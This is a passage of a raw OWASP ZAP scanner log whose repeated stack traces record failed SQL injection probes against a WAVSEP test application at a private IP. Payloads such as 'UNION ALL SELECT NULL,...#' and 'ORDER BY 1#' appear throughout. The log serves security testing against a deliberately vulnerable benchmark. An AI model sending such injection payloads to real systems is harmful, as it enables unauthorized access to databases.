org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679767 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679768 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679769 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679769 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679770 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679771 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679772 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679773 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 1760#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1760# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679773 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679774 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679775 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679776 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679777 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at 